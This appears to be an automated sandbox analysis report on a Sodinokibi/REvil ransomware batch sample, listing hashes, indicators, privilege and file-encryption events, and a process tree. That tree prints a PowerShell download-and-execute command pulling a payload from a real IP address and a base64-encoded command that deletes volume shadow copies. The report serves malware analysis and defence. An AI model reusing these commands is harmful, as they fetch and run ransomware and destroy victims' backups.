Analysis
-
max time kernel
136s -
max time network
56s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
03-06-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
837314d5a05e52f9e0f09a5a473497d3.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
837314d5a05e52f9e0f09a5a473497d3.bat
Resource
win10v200430
General
-
Target
837314d5a05e52f9e0f09a5a473497d3.bat
-
Size
219B
-
MD5
e87a8c6ada089d0fc3473fb4ba1558c2
-
SHA1
dd36ca2fa4407f895a6261a1cfee402482ed0bc9
-
SHA256
26044d6010566eb7dd69bf7aa8595f0aa4b739d18418526591bd1bf544f91b4a
-
SHA512
254f838fba727d5a1fc5a71a60182b9b940e0fcb93a0797e335ee99e46d4a8ea2d7a613f7ee72a567146a7d13ff2bc20f8187eb199bd336969eedfed6403ed4c
Malware Config
Extracted
http://185.103.242.78/pastes/837314d5a05e52f9e0f09a5a473497d3
Extracted
C:\88a3w9hls4-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/99CC83E05C635FBD
http://decryptor.cc/99CC83E05C635FBD
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeBackupPrivilege 1616 vssvc.exe Token: SeRestorePrivilege 1616 vssvc.exe Token: SeAuditPrivilege 1616 vssvc.exe Token: SeTakeOwnershipPrivilege 364 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 364 powershell.exe 364 powershell.exe 364 powershell.exe 1900 powershell.exe 1900 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe -
Enumerates connected drives 3 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\l77lgdo6tb5n0.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1032 wrote to memory of 364 1032 cmd.exe powershell.exe PID 364 wrote to memory of 1900 364 powershell.exe powershell.exe PID 364 wrote to memory of 1900 364 powershell.exe powershell.exe PID 364 wrote to memory of 1900 364 powershell.exe powershell.exe PID 364 wrote to memory of 1900 364 powershell.exe powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 364 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 34 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\AddUpdate.wav powershell.exe File opened for modification \??\c:\program files\ConvertFromJoin.doc powershell.exe File opened for modification \??\c:\program files\GetEnable.temp powershell.exe File opened for modification \??\c:\program files\RevokePop.3gpp powershell.exe File opened for modification \??\c:\program files\StartPublish.dotm powershell.exe File opened for modification \??\c:\program files\UpdateEnter.rle powershell.exe File opened for modification \??\c:\program files\LimitUninstall.vbs powershell.exe File created \??\c:\program files\microsoft sql server compact edition\88a3w9hls4-readme.txt powershell.exe File opened for modification \??\c:\program files\PingComplete.xlsb powershell.exe File opened for modification \??\c:\program files\ConvertRequest.midi powershell.exe File opened for modification \??\c:\program files\ExportProtect.ppsm powershell.exe File opened for modification \??\c:\program files\NewAdd.vsdx powershell.exe File opened for modification \??\c:\program files\RevokeShow.clr powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\88a3w9hls4-readme.txt powershell.exe File opened for modification \??\c:\program files\DebugRename.xps powershell.exe File opened for modification \??\c:\program files\ResolveDisconnect.js powershell.exe File opened for modification \??\c:\program files\SaveConvertFrom.au3 powershell.exe File opened for modification \??\c:\program files\StepShow.ppt powershell.exe File opened for modification \??\c:\program files\ApprovePublish.mpeg3 powershell.exe File opened for modification \??\c:\program files\SendMount.xls powershell.exe File created \??\c:\program files (x86)\88a3w9hls4-readme.txt powershell.exe File opened for modification \??\c:\program files\PublishTest.shtml powershell.exe File opened for modification \??\c:\program files\RenameSwitch.ram powershell.exe File created \??\c:\program files\88a3w9hls4-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectLimit.wma powershell.exe File opened for modification \??\c:\program files\InitializeInvoke.wvx powershell.exe File opened for modification \??\c:\program files\OptimizeStart.mid powershell.exe File opened for modification \??\c:\program files\ShowConvertTo.zip powershell.exe File opened for modification \??\c:\program files\TracePublish.gif powershell.exe File opened for modification \??\c:\program files\UnblockLock.xlt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\88a3w9hls4-readme.txt powershell.exe File opened for modification \??\c:\program files\RestoreGroup.raw powershell.exe File opened for modification \??\c:\program files\ResumeProtect.doc powershell.exe File opened for modification \??\c:\program files\UnprotectUnblock.vssx powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\837314d5a05e52f9e0f09a5a473497d3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/837314d5a05e52f9e0f09a5a473497d3');Invoke-VPQRVSXXHIUV;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Drops file in Program Files directory
PID:364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1900
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1616